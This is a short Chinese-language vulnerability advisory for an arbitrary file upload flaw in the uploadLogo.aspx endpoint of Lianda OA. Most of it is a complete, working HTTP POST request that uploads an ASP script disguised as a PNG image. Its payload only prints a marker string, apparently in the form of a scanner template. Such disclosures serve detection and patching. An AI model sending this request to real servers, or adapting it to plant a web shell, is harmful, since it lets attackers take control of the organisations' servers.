联达OA uploadLogo.aspx任意文件上传

日期: 2023-11-07 | 影响软件: 联达OA | POC: 已公开

漏洞描述

联达动力oa是PHPOA推出的新一代OA系统,系统支持性好、安全、数据高速缓存化;支持100+应用自行安装与定义,应用表单自定义,支持应用无代码开发,支持多语言。该系统存在任意文件上传,攻击者可以上传任意文件控制服务器。

PoC代码

POST /Hosp_Portal/uploadLogo.aspx HTTP/1.1
Host: 
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 326
Content-Type: multipart/form-data; boundary=d0b7a0d40eed0e32904c8017b09eb305
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0

--d0b7a0d40eed0e32904c8017b09eb305
Content-Disposition: form-data; name="DesignId"

1
--d0b7a0d40eed0e32904c8017b09eb305
Content-Disposition: form-data; name="Filedata"; filename="{{username}}.asp"
Content-Type: image/png

<% Response.Write("pboyjnnrfipmplsukdeczudsefxmywe") %>
--d0b7a0d40eed0e32904c8017b09eb305--

相关漏洞推荐